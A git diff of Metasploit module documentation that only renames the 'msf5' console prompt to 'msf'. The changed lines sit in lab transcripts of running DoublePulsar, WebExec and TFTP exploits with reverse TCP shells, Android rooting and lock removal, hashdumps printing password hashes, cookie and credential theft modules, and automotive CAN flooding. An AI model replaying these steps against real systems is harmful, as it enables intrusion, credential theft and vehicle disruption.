+++ b/documentation/modules/exploit/windows/rdp/rdp_doublepulsar_rce.md @@ -32,7 +32,7 @@ Defaults to `spoolsv.exe`. Pinging the implant: ``` -msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check +msf exploit(windows/rdp/rdp_doublepulsar_rce) > check [*] 192.168.56.115:3389 - Verifying RDP protocol... [*] 192.168.56.115:3389 - Attempting to connect using TLS security @@ -41,15 +41,15 @@ msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > check [!] 192.168.56.115:3389 - DOUBLEPULSAR RDP IMPLANT DETECTED!!! [+] 192.168.56.115:3389 - Target is Windows Server 6.1.7601 SP1 x64 [+] 192.168.56.115:3389 - The target is vulnerable. -msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > +msf exploit(windows/rdp/rdp_doublepulsar_rce) > ``` Executing a payload: ``` -msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Execute\ payload +msf exploit(windows/rdp/rdp_doublepulsar_rce) > set target Execute\ payload target => Execute payload -msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run +msf exploit(windows/rdp/rdp_doublepulsar_rce) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] 192.168.56.115:3389 - Verifying RDP protocol... @@ -81,9 +81,9 @@ meterpreter > Neutralizing the implant: ``` -msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > set target Neutralize\ implant +msf exploit(windows/rdp/rdp_doublepulsar_rce) > set target Neutralize\ implant target => Neutralize implant -msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run +msf exploit(windows/rdp/rdp_doublepulsar_rce) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] 192.168.56.115:3389 - Verifying RDP protocol... @@ -95,5 +95,5 @@ msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > run [*] 192.168.56.115:3389 - Neutralizing DOUBLEPULSAR [+] 192.168.56.115:3389 - Implant neutralization successful [*] Exploit completed, but no session was created. -msf5 exploit(windows/rdp/rdp_doublepulsar_rce) > +msf exploit(windows/rdp/rdp_doublepulsar_rce) > ``` 
diff --git a/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md b/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md index 68e3ce776c..a2224899bf 100644 --- a/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md +++ b/documentation/modules/exploit/windows/smb/smb_doublepulsar_rce.md @@ -32,22 +32,22 @@ Defaults to `spoolsv.exe`. Pinging the implant: ``` -msf5 exploit(windows/smb/smb_doublepulsar_rce) > check +msf exploit(windows/smb/smb_doublepulsar_rce) > check [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048 [*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1 [*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR [!] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64 [+] 192.168.56.115:445 - The target is vulnerable. -msf5 exploit(windows/smb/smb_doublepulsar_rce) > +msf exploit(windows/smb/smb_doublepulsar_rce) > ``` Executing a payload: ``` -msf5 exploit(windows/smb/smb_doublepulsar_rce) > set target Execute\ payload +msf exploit(windows/smb/smb_doublepulsar_rce) > set target Execute\ payload target => Execute payload -msf5 exploit(windows/smb/smb_doublepulsar_rce) > run +msf exploit(windows/smb/smb_doublepulsar_rce) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048 @@ -78,9 +78,9 @@ meterpreter > Neutralizing the implant: ``` -msf5 exploit(windows/smb/smb_doublepulsar_rce) > set target Neutralize\ implant +msf exploit(windows/smb/smb_doublepulsar_rce) > set target Neutralize\ implant target => Neutralize implant -msf5 exploit(windows/smb/smb_doublepulsar_rce) > run +msf exploit(windows/smb/smb_doublepulsar_rce) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048 
@@ -90,5 +90,5 @@ msf5 exploit(windows/smb/smb_doublepulsar_rce) > run [*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR [+] 192.168.56.115:445 - Implant neutralization successful [*] Exploit completed, but no session was created. -msf5 exploit(windows/smb/smb_doublepulsar_rce) > +msf exploit(windows/smb/smb_doublepulsar_rce) > ``` diff --git a/documentation/modules/exploit/windows/smb/webexec.md b/documentation/modules/exploit/windows/smb/webexec.md index 897d6b5d19..eef1e92060 100644 --- a/documentation/modules/exploit/windows/smb/webexec.md +++ b/documentation/modules/exploit/windows/smb/webexec.md @@ -27,18 +27,18 @@ ``` - msf5 > use exploit/windows/smb/webexec - msf5 exploit(windows/smb/webexec) > set smbuser a_user + msf > use exploit/windows/smb/webexec + msf exploit(windows/smb/webexec) > set smbuser a_user smbuser => a_user - msf5 exploit(windows/smb/webexec) > set smbpass password + msf exploit(windows/smb/webexec) > set smbpass password smbpass => password - msf5 exploit(windows/smb/webexec) > set rhosts 192.168.37.136 + msf exploit(windows/smb/webexec) > set rhosts 192.168.37.136 rhosts => 192.168.37.136 - msf5 exploit(windows/smb/webexec) > set payload windows/meterpreter/reverse_tcp + msf exploit(windows/smb/webexec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(windows/smb/webexec) > set lhost 192.168.37.1 + msf exploit(windows/smb/webexec) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(windows/smb/webexec) > run + msf exploit(windows/smb/webexec) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] 192.168.37.136:445 - Connecting to the server... diff --git a/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md b/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md index bb1f5f7977..cb1c2e5844 100644 --- a/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md 
+++ b/documentation/modules/exploit/windows/tftp/distinct_tftp_traversal.md @@ -44,10 +44,10 @@ ### Microsoft Windows XP SP3 (EN) ``` - msf5 > use exploit/windows/tftp/distinct_tftp_traversal - msf5 exploit(windows/tftp/distinct_tftp_traversal) > set rhosts 172.16.191.205 + msf > use exploit/windows/tftp/distinct_tftp_traversal + msf exploit(windows/tftp/distinct_tftp_traversal) > set rhosts 172.16.191.205 rhosts => 172.16.191.205 - msf5 exploit(windows/tftp/distinct_tftp_traversal) > run + msf exploit(windows/tftp/distinct_tftp_traversal) > run [*] Started reverse TCP handler on 172.16.191.165:4444 [*] Sending EXE (73802 bytes) diff --git a/documentation/modules/payload/windows/shell/reverse_ord_tcp.md b/documentation/modules/payload/windows/shell/reverse_ord_tcp.md index 066166ad08..0464b6ca3a 100644 --- a/documentation/modules/payload/windows/shell/reverse_ord_tcp.md +++ b/documentation/modules/payload/windows/shell/reverse_ord_tcp.md @@ -18,7 +18,7 @@ This Meterpreter payload is suitable for the following environments: To check its compatibility with an exploit, select the exploit in the msf console and type the ```info``` command. The output will be similar to: ``` -msf5 payload(windows/shell/reverse_tcp) > info +msf payload(windows/shell/reverse_tcp) > info Name: Windows Command Shell, Reverse TCP Stager Module: payload/windows/shell/reverse_tcp diff --git a/documentation/modules/post/android/capture/screen.md b/documentation/modules/post/android/capture/screen.md index 97fb6b54e5..43067458f6 100644 --- a/documentation/modules/post/android/capture/screen.md +++ b/documentation/modules/post/android/capture/screen.md @@ -29,7 +29,7 @@ Utilizing futex_requeue to get root access. ``` -msf5 exploit(android/local/futex_requeue) > run +msf exploit(android/local/futex_requeue) > run [*] Started reverse TCP handler on 111.111.1.111:4444 [*] Using target: New Samsung 
@@ -43,10 +43,10 @@ meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 meterpreter > background [*] Backgrounding session 4... -msf5 exploit(android/local/futex_requeue) > use post/android/capture/screen -msf5 post(android/capture/screen) > set session 4 +msf exploit(android/local/futex_requeue) > use post/android/capture/screen +msf post(android/capture/screen) > set session 4 session => 4 -msf5 post(android/capture/screen) > run +msf post(android/capture/screen) > run [!] SESSION may not be compatible with this module. [+] Downloading screenshot... diff --git a/documentation/modules/post/android/gather/hashdump.md b/documentation/modules/post/android/gather/hashdump.md index f68a5a8201..895ee0861f 100644 --- a/documentation/modules/post/android/gather/hashdump.md +++ b/documentation/modules/post/android/gather/hashdump.md @@ -100,7 +100,7 @@ resource (android.128.rb)> run [+] SHA1: EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b [+] Crack with: hashcat -m 5800 EA8457DE97836C955082AE77DBE2CD86A4E8BC0E:4aafc54dc502e88b [*] Post module execution completed -msf5 post(android/gather/hashdump) > creds +msf post(android/gather/hashdump) > creds Credentials =========== diff --git a/documentation/modules/post/android/gather/sub_info.md b/documentation/modules/post/android/gather/sub_info.md index e1b20ec542..7564a8efa1 100644 --- a/documentation/modules/post/android/gather/sub_info.md +++ b/documentation/modules/post/android/gather/sub_info.md @@ -24,10 +24,10 @@ ``` -msf5 exploit(multi/handler) > use post/android/gather/sub_info -msf5 post(android/gather/sub_info) > set session 1 +msf exploit(multi/handler) > use post/android/gather/sub_info +msf post(android/gather/sub_info) > set session 1 session => 1 -msf5 post(android/gather/sub_info) > run +msf post(android/gather/sub_info) > run [!] SESSION may not be compatible with this module. [*] using code : 1 
@@ -95,5 +95,5 @@ Subscriber info VoiceMailNumberForSubscriber [*] Post module execution completed -msf5 post(android/gather/sub_info) > +msf post(android/gather/sub_info) > ``` diff --git a/documentation/modules/post/android/gather/wireless_ap.md b/documentation/modules/post/android/gather/wireless_ap.md index d3e744b6d7..dd20f7b744 100644 --- a/documentation/modules/post/android/gather/wireless_ap.md +++ b/documentation/modules/post/android/gather/wireless_ap.md @@ -23,10 +23,10 @@ ``` -msf5 exploit(multi/handler) > use post/android/gather/wireless_ap -msf5 post(android/gather/wireless_ap) > set session 1 +msf exploit(multi/handler) > use post/android/gather/wireless_ap +msf post(android/gather/wireless_ap) > set session 1 session => 1 -msf5 post(android/gather/wireless_ap) > run +msf post(android/gather/wireless_ap) > run Wireless APs ============ @@ -41,5 +41,5 @@ Wireless APs [+] Secrets stored in: ~/.msf4/loot/...wireless.ap.cred_...txt [*] Post module execution completed -msf5 post(android/gather/wireless_ap) > +msf post(android/gather/wireless_ap) > ``` diff --git a/documentation/modules/post/android/manage/remove_lock_root.md b/documentation/modules/post/android/manage/remove_lock_root.md index d6ef78b6a8..01d19e2b3c 100644 --- a/documentation/modules/post/android/manage/remove_lock_root.md +++ b/documentation/modules/post/android/manage/remove_lock_root.md @@ -24,7 +24,7 @@ Utilizing futex_requeue to get root access. ``` -msf5 exploit(android/local/futex_requeue) > run +msf exploit(android/local/futex_requeue) > run [*] Started reverse TCP handler on 111.111.1.111:4444 [*] Using target: New Samsung 
@@ -38,10 +38,10 @@ meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 meterpreter > background [*] Backgrounding session 4... -msf5 exploit(android/local/futex_requeue) > use post/android/manage/remove_lock_root -msf5 post(android/manage/remove_lock_root) > set session 4 +msf exploit(android/local/futex_requeue) > use post/android/manage/remove_lock_root +msf post(android/manage/remove_lock_root) > set session 4 session => 4 -msf5 post(android/manage/remove_lock_root) > run +msf post(android/manage/remove_lock_root) > run [!] SESSION may not be compatible with this module. [*] Removing /data/system/password.key diff --git a/documentation/modules/post/apple_ios/gather/ios_image_gather.md b/documentation/modules/post/apple_ios/gather/ios_image_gather.md index 1c200d81aa..1145b97008 100644 --- a/documentation/modules/post/apple_ios/gather/ios_image_gather.md +++ b/documentation/modules/post/apple_ios/gather/ios_image_gather.md @@ -17,10 +17,10 @@ ``` - msf5 > use post/apple_ios/gather/ios_image_gather - msf5 post(apple_ios/gather/ios_image_gather) > set session 1 + msf > use post/apple_ios/gather/ios_image_gather + msf post(apple_ios/gather/ios_image_gather) > set session 1 session => 1 - msf5 post(apple_ios/gather/ios_image_gather) > run + msf post(apple_ios/gather/ios_image_gather) > run [!] SESSION may not be compatible with this module. [+] Image path found. Will begin searching for images... diff --git a/documentation/modules/post/apple_ios/gather/ios_text_gather.md b/documentation/modules/post/apple_ios/gather/ios_text_gather.md index 02d361d3c9..1320ff146f 100644 --- a/documentation/modules/post/apple_ios/gather/ios_text_gather.md +++ b/documentation/modules/post/apple_ios/gather/ios_text_gather.md 
@@ -17,10 +17,10 @@ ``` - msf5 > use post/apple_ios/gather/ios_text_gather - msf5 post(apple_ios/gather/ios_text_gather) > set session 1 + msf > use post/apple_ios/gather/ios_text_gather + msf post(apple_ios/gather/ios_text_gather) > set session 1 session => 1 - msf5 post(apple_ios/gather/ios_text_gather) > run + msf post(apple_ios/gather/ios_text_gather) > run [!] SESSION may not be compatible with this module. [+] sms.db file found diff --git a/documentation/modules/post/bsd/gather/hashdump.md b/documentation/modules/post/bsd/gather/hashdump.md index 336d21666d..89d7efac2c 100644 --- a/documentation/modules/post/bsd/gather/hashdump.md +++ b/documentation/modules/post/bsd/gather/hashdump.md @@ -20,12 +20,12 @@ ### FreeBSD 11.1-RELEASE-i386 ``` - msf5 > use post/bsd/gather/hashdump - msf5 post(bsd/gather/hashdump) > set session 1 + msf > use post/bsd/gather/hashdump + msf post(bsd/gather/hashdump) > set session 1 session => 1 - msf5 post(bsd/gather/hashdump) > set verbose true + msf post(bsd/gather/hashdump) > set verbose true verbose => true - msf5 post(bsd/gather/hashdump) > run + msf post(bsd/gather/hashdump) > run [!] SESSION may not be compatible with this module. [+] passwd saved in: /root/.msf4/loot/20191027022955_default_172.16.191.175_passwd_886442.txt @@ -34,7 +34,7 @@ [+] user:$6$0De1rFoA/9y9ZNs/$0w33L7Iox0MGMleEF0mndGGxQ.xKAtWzEo5pzLrN35EonLTnb.NWuHVVbpUQS4aSY0pB2gfi9UXj5zUw2Y7Ds0:1001:1001:user:/home/user:/bin/sh [+] Unshadowed Password File: /root/.msf4/loot/20191027022956_default_172.16.191.175_bsd.hashes_729820.txt [*] Post module execution completed - msf5 post(bsd/gather/hashdump) > creds + msf post(bsd/gather/hashdump) > creds Credentials =========== 
@@ -43,7 +43,7 @@ 172.16.191.175 root $6$qHMkv01VUXi9UCIK$ReQbxn2vo/i/nnHHtdw3U8BS0IpPRjJmFS6mYPPAkrqP5bHn1m2ReWiRpfEpHbEtAik6rHGpwdF7jaVZwiq22/ Nonreplayable hash sha512,crypt 172.16.191.175 user $6$0De1rFoA/9y9ZNs/$0w33L7Iox0MGMleEF0mndGGxQ.xKAtWzEo5pzLrN35EonLTnb.NWuHVVbpUQS4aSY0pB2gfi9UXj5zUw2Y7Ds0 Nonreplayable hash sha512,crypt - msf5 post(bsd/gather/hashdump) > + msf post(bsd/gather/hashdump) > ``` ### Crack Hashes (John the Ripper) diff --git a/documentation/modules/post/hardware/automotive/can_flood.md b/documentation/modules/post/hardware/automotive/can_flood.md index 255e98d238..134f49c3cc 100644 --- a/documentation/modules/post/hardware/automotive/can_flood.md +++ b/documentation/modules/post/hardware/automotive/can_flood.md @@ -45,17 +45,17 @@ The user must know a list of frames that generate an effect on the car. This is You can test the module by setting a virtual CAN interface and then execute the commands, thus obtaining the underlying output: ``` -msf5 > use auxiliary/server/local_hwbridge -msf5 auxiliary(server/local_hwbridge) > run +msf > use auxiliary/server/local_hwbridge +msf auxiliary(server/local_hwbridge) > run [*] Auxiliary module running as background job 0. [*] Using URL: http://0.0.0.0:8080/trycanbus [*] Local IP: http://10.0.2.15:8080/trycanbus [*] Server started. -msf5 auxiliary(server/local_hwbridge) > use auxiliary/client/hwbridge/connect -msf5 auxiliary(client/hwbridge/connect) > set targeturi trycanbus +msf auxiliary(server/local_hwbridge) > use auxiliary/client/hwbridge/connect +msf auxiliary(client/hwbridge/connect) > set targeturi trycanbus targeturi => trycanbus -msf5 auxiliary(client/hwbridge/connect) > run +msf auxiliary(client/hwbridge/connect) > run [*] Attempting to connect to 127.0.0.1... [*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2019-03-20 03:17:55 -0400 
@@ -65,12 +65,12 @@ msf5 auxiliary(client/hwbridge/connect) > run [!] could have real world consequences. Use this module in a controlled testing [!] environment and with equipment you are authorized to perform testing on. [*] Auxiliary module execution completed -msf5 auxiliary(client/hwbridge/connect) > use post/hardware/automotive/can_flood -msf5 post(hardware/automotive/can_flood) > set canbus vcan0 +msf auxiliary(client/hwbridge/connect) > use post/hardware/automotive/can_flood +msf post(hardware/automotive/can_flood) > set canbus vcan0 canbus => vcan0 -msf5 post(hardware/automotive/can_flood) > set session 1 +msf post(hardware/automotive/can_flood) > set session 1 session => 1 -msf5 post(hardware/automotive/can_flood) > run +msf post(hardware/automotive/can_flood) > run [*] -- FLOODING -- [*] Post module execution completed diff --git a/documentation/modules/post/hardware/automotive/diagnostic_state.md b/documentation/modules/post/hardware/automotive/diagnostic_state.md index a98638cc2a..4980353700 100644 --- a/documentation/modules/post/hardware/automotive/diagnostic_state.md +++ b/documentation/modules/post/hardware/automotive/diagnostic_state.md @@ -36,7 +36,7 @@ Module options (post/hardware/automotive/diagnostic_state): You can test this module doing a candump and you should receive a response for each can frame in a loop at 0x7E8 when running UDS Simulator. ``` -msf5 auxiliary(client/hwbridge/connect) > run +msf auxiliary(client/hwbridge/connect) > run [*] Running module against 127.0.0.1 [*] Attempting to connect to 127.0.0.1... @@ -47,7 +47,7 @@ msf5 auxiliary(client/hwbridge/connect) > run [!] could have real world consequences. Use this module in a controlled testing [!] environment and with equipment you are authorized to perform testing on. [*] Auxiliary module execution completed -msf5 auxiliary(client/hwbridge/connect) > sessions +msf auxiliary(client/hwbridge/connect) > sessions Active sessions =============== 
@@ -56,7 +56,7 @@ Active sessions -- ---- ---- ----------- ---------- 1 hwbridge cmd/hardware automotive 127.0.0.1 -> 127.0.0.1 (127.0.0.1) -msf5 auxiliary(client/hwbridge/connect) > sessions -i 1 +msf auxiliary(client/hwbridge/connect) > sessions -i 1 [*] Starting interaction with 1... hwbridge > run post/hardware/automotive/diagnostic_state canbus=vcan0 diff --git a/documentation/modules/post/hardware/automotive/ecu_hard_reset.md b/documentation/modules/post/hardware/automotive/ecu_hard_reset.md index 70b52764b7..56fbea65fc 100644 --- a/documentation/modules/post/hardware/automotive/ecu_hard_reset.md +++ b/documentation/modules/post/hardware/automotive/ecu_hard_reset.md @@ -32,7 +32,7 @@ CAN Bus to perform scan on, defaults to connected bus Using UDS simulator for testing ECU hard reset: ``` -msf5 auxiliary(client/hwbridge/connect) > run +msf auxiliary(client/hwbridge/connect) > run [*] Running module against 127.0.0.1 [*] Attempting to connect to 127.0.0.1... @@ -43,7 +43,7 @@ msf5 auxiliary(client/hwbridge/connect) > run [!] could have real world consequences. Use this module in a controlled testing [!] environment and with equipment you are authorized to perform testing on. [*] Auxiliary module execution completed -msf5 auxiliary(client/hwbridge/connect) > sessions +msf auxiliary(client/hwbridge/connect) > sessions Active sessions =============== @@ -52,7 +52,7 @@ Active sessions -- ---- ---- ----------- ---------- 1 hwbridge cmd/hardware automotive 127.0.0.1 -> 127.0.0.1 (127.0.0.1) -msf5 auxiliary(client/hwbridge/connect) > sessions -i 1 +msf auxiliary(client/hwbridge/connect) > sessions -i 1 [*] Starting interaction with 1... hwbridge > run post/hardware/automotive/ecu_hard_reset CANBUS=vcan0 diff --git a/documentation/modules/post/hardware/automotive/mazda_ic_mover.md b/documentation/modules/post/hardware/automotive/mazda_ic_mover.md index 962360be60..46fc7e36f6 100644 --- a/documentation/modules/post/hardware/automotive/mazda_ic_mover.md 
+++ b/documentation/modules/post/hardware/automotive/mazda_ic_mover.md @@ -33,7 +33,7 @@ CAN Bus to perform scan on, defaults to connected bus A successful spoofing of an instrument cluster on a target vehicle: ``` -msf5 auxiliary(client/hwbridge/connect) > run +msf auxiliary(client/hwbridge/connect) > run [*] Running module against 127.0.0.1 [*] Attempting to connect to 127.0.0.1... @@ -44,7 +44,7 @@ msf5 auxiliary(client/hwbridge/connect) > run [!] could have real world consequences. Use this module in a controlled testing [!] environment and with equipment you are authorized to perform testing on. [*] Auxiliary module execution completed -msf5 auxiliary(client/hwbridge/connect) > sessions +msf auxiliary(client/hwbridge/connect) > sessions Active sessions =============== @@ -53,7 +53,7 @@ Active sessions -- ---- ---- ----------- ---------- 2 hwbridge cmd/hardware automotive 127.0.0.1 -> 127.0.0.1 (127.0.0.1) -msf5 auxiliary(client/hwbridge/connect) > sessions -i 2 +msf auxiliary(client/hwbridge/connect) > sessions -i 2 [*] Starting interaction with 2... hwbridge > run post/hardware/automotive/mazda_ic_mover CANBUS=vcan0 diff --git a/documentation/modules/post/linux/gather/enum_containers.md b/documentation/modules/post/linux/gather/enum_containers.md index 6ff61891de..6cecffe937 100644 --- a/documentation/modules/post/linux/gather/enum_containers.md +++ b/documentation/modules/post/linux/gather/enum_containers.md @@ -29,9 +29,9 @@ This module looks for container platforms running on the target and then lists a Scenario 1: Docker is installed with 4 running containers ``` -msf5 post(linux/gather/enum_containers) > set session 4 +msf post(linux/gather/enum_containers) > set session 4 session => 4 -msf5 post(linux/gather/enum_containers) > run +msf post(linux/gather/enum_containers) > run [+] docker was found on the system! [+] docker: 1 Running Containers / 5 Total 
@@ -47,9 +47,9 @@ cfa40ec4d85c nginx "/docker-entrypoint.…" 2 days ago Scenario 2: Docker, LXC and RKT are installed, and each of them are running their own containers ``` -msf5 post(linux/gather/enum_containers) > set session 2 +msf post(linux/gather/enum_containers) > set session 2 session => 2 -msf5 post(linux/gather/enum_containers) > exploit +msf post(linux/gather/enum_containers) > exploit [+] docker was found on the system! [+] docker: 1 Running Containers / 5 Total @@ -75,24 +75,24 @@ UUID APP IMAGE NAME STATE CREATED [+] Results stored in: /home/gwillcox/.msf4/loot/20200805193842_default_172.27.129.4_host.rkt_contain_801968.txt [*] Post module execution completed -msf5 post(linux/gather/enum_containers) > +msf post(linux/gather/enum_containers) > Scenario 3: No container software is runnable ``` -msf5 post(linux/gather/enum_containers) > set session 6 +msf post(linux/gather/enum_containers) > set session 6 session => 6 -msf5 post(linux/gather/enum_containers) > run +msf post(linux/gather/enum_containers) > run [-] No container software appears to be installed or runnable by the current user [*] Post module execution completed ``` Scenario 4: List all containers and execute the `env` command on all running containers ``` -msf5 post(linux/gather/enum_containers) > set session 6 +msf post(linux/gather/enum_containers) > set session 6 session => 6 -msf5 post(linux/gather/enum_containers) > set CMD "env" +msf post(linux/gather/enum_containers) > set CMD "env" CMD => env -msf5 post(linux/gather/enum_containers) > run +msf post(linux/gather/enum_containers) > run [+] docker was found on the system! [+] docker: 1 Running Containers / 5 Total @@ -147,5 +147,5 @@ PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/us LANG=C PWD=/home/gwillcox/git/metasploit-framework [*] Post module execution completed -msf5 post(linux/gather/enum_containers) > -``` \ No newline at end of file +msf post(linux/gather/enum_containers) > +``` 
diff --git a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md index ae077120c7..a950d2d1ed 100644 --- a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md +++ b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md @@ -15,12 +15,12 @@ This post module gathers PhpMyAdmin Creds from target Linux machine. ## Scenarios ``` -msf5 > use multi/handler -msf5 exploit(multi/handler) > set lhost 192.168.37.1 +msf > use multi/handler +msf exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 -msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp +msf exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp -msf5 exploit(multi/handler) > run +msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (816260 bytes) to 192.168.37.226 @@ -28,10 +28,10 @@ msf5 exploit(multi/handler) > run meterpreter > background [*] Backgrounding session 2... -msf5 exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal -msf5 post(linux/gather/phpmyadmin_credsteal) > set session 2 +msf exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal +msf post(linux/gather/phpmyadmin_credsteal) > set session 2 session => 2 -msf5 post(linux/gather/phpmyadmin_credsteal) > run +msf post(linux/gather/phpmyadmin_credsteal) > run PhpMyAdmin Creds Stealer! @@ -43,6 +43,6 @@ PhpMyAdmin Creds Stealer! [*] Storing credentials... [+] Config file located at /Users/space/.msf4/loot/20180907081056_default_192.168.37.226_phpmyadmin_conf_580315.txt [*] Post module execution completed -msf5 post(linux/gather/phpmyadmin_credsteal) > +msf post(linux/gather/phpmyadmin_credsteal) > ``` diff --git a/documentation/modules/post/multi/gather/chrome_cookies.md b/documentation/modules/post/multi/gather/chrome_cookies.md index b64542af1e..eff7469d00 100644 
--- a/documentation/modules/post/multi/gather/chrome_cookies.md +++ b/documentation/modules/post/multi/gather/chrome_cookies.md @@ -77,7 +77,7 @@ msf post(multi/gather/chrome_cookies) > run [*] Removing file \Users\msfdev\AppData\Local\Temp\YaW8HKZdkk2s85D.html [*] Removing file \Users\msfdev\AppData\Local\Google\Chrome\User Data\chrome_debug.log [*] Post module execution completed -msf5 post(multi/gather/chrome_cookies) > +msf post(multi/gather/chrome_cookies) > ``` diff --git a/documentation/modules/post/multi/gather/enum_hexchat.md b/documentation/modules/post/multi/gather/enum_hexchat.md index 22de32e897..6b97f36c9b 100644 --- a/documentation/modules/post/multi/gather/enum_hexchat.md +++ b/documentation/modules/post/multi/gather/enum_hexchat.md @@ -128,7 +128,7 @@ Gather the files from XCHat. Default `false`. xchat => true resource (xchat_win.rb)> set verbose true verbose => true - msf5 post(multi/gather/enum_hexchat) > rexploit + msf post(multi/gather/enum_hexchat) > rexploit [*] Reloading module... [!] SESSION may not be compatible with this module. diff --git a/documentation/modules/post/multi/gather/grub_creds.md b/documentation/modules/post/multi/gather/grub_creds.md index d3eeea214b..f63fe7b757 100644 --- a/documentation/modules/post/multi/gather/grub_creds.md +++ b/documentation/modules/post/multi/gather/grub_creds.md @@ -59,8 +59,8 @@ action. Typical run against Ubuntu 18.04 LTS ``` -msf5 exploit(handler) > use post/multi/gather/grub_creds -msf5 post(grub_creds) > set SESSION 1 +msf exploit(handler) > use post/multi/gather/grub_creds +msf post(grub_creds) > set SESSION 1 SESSION => 1 msf post(grub_creds) > run diff --git a/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md b/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md index 945a9d6d60..0df12e0a87 100644 --- a/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md +++ b/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md 
@@ -88,7 +88,7 @@ resource (unifi.rb)> run #### Details ``` -msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 2 +msf post(multi/gather/ubiquiti_unifi_backup) > sessions -i 2 [*] Starting interaction with 2... meterpreter > getuid @@ -101,7 +101,7 @@ BuildTuple : i486-linux-musl Meterpreter : x86/linux meterpreter > background [*] Backgrounding session 2... -msf5 post(multi/gather/ubiquiti_unifi_backup) > loot +msf post(multi/gather/ubiquiti_unifi_backup) > loot Loot ==== @@ -164,7 +164,7 @@ resource (unifi.rb)> run #### Details ``` -msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 3 +msf post(multi/gather/ubiquiti_unifi_backup) > sessions -i 3 [*] Starting interaction with 3... meterpreter > getuid @@ -179,7 +179,7 @@ Logged On Users : 1 Meterpreter : x86/windows meterpreter > background [*] Backgrounding session 3... -msf5 post(multi/gather/ubiquiti_unifi_backup) > loot +msf post(multi/gather/ubiquiti_unifi_backup) > loot Loot ==== @@ -197,7 +197,7 @@ host service type name #### Module ``` -msf5 post(multi/gather/ubiquiti_unifi_backup) > rexploit +msf post(multi/gather/ubiquiti_unifi_backup) > rexploit [*] Reloading module... [+] Read UniFi Controller file /Users/unifi/Library/Application Support/Unifi/data/system.properties @@ -214,7 +214,7 @@ An example of the output when not utilizing meterpreter (just a shell) to access work successfully. ``` -msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions +msf post(multi/gather/ubiquiti_unifi_backup) > sessions Active sessions =============== 
@@ -224,9 +224,9 @@ Active sessions 1 shell linux SSH unifi:unifi (1.1.1.1:22) 2.2.2.2:35125 -> 1.1.1.1:22 (1.1.1.1) 2 meterpreter x86/linux uid=1000, gid=1000, euid=1000, egid=1000 @ 1.1.1.1 2.2.2.2:4433 -> 1.1.1.1:52584 (1.1.1.1) -msf5 post(multi/gather/ubiquiti_unifi_backup) > session -i 1 +msf post(multi/gather/ubiquiti_unifi_backup) > session -i 1 l[-] Unknown command: session. -msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 1 +msf post(multi/gather/ubiquiti_unifi_backup) > sessions -i 1 [*] Starting interaction with 1... ls -lah /var/lib/unifi/backup/*.unf @@ -235,9 +235,9 @@ ls -lah /var/lib/unifi/backup/*.unf -rw-r----- 1 unifi unifi 3.3M May 10 14:26 /var/lib/unifi/backup/5.10.23.unf ^Z Background session 1? [y/N] y -msf5 post(multi/gather/ubiquiti_unifi_backup) > set session 1 +msf post(multi/gather/ubiquiti_unifi_backup) > set session 1 session => 1 -msf5 post(multi/gather/ubiquiti_unifi_backup) > run +msf post(multi/gather/ubiquiti_unifi_backup) > run [!] SESSION may not be compatible with this module. [+] Read UniFi Controller file /var/lib/unifi/system.properties diff --git a/documentation/modules/post/multi/recon/sudo_commands.md b/documentation/modules/post/multi/recon/sudo_commands.md index 5bf4399aca..d36f1f23ea 100644 --- a/documentation/modules/post/multi/recon/sudo_commands.md +++ b/documentation/modules/post/multi/recon/sudo_commands.md @@ -40,12 +40,12 @@ ## Scenarios 